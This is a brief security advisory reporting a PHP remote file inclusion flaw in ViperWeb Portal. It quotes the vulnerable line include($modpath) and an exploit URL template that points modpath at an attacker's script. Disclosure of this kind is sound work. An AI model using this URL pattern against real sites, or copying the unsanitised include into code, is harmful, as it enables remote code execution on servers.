PHP remote file inclusion vulnerabilities in ViperWeb Portal allow remote attackers to execute arbitrary PHP code via a URL in the $modpath variable. http://<Target_Web>/index.php?modpath=<Evil_Script> Found in: line32. Code: include($modpath); Vulnerability found by Abdus Samad Advanced Research Project and Technologies.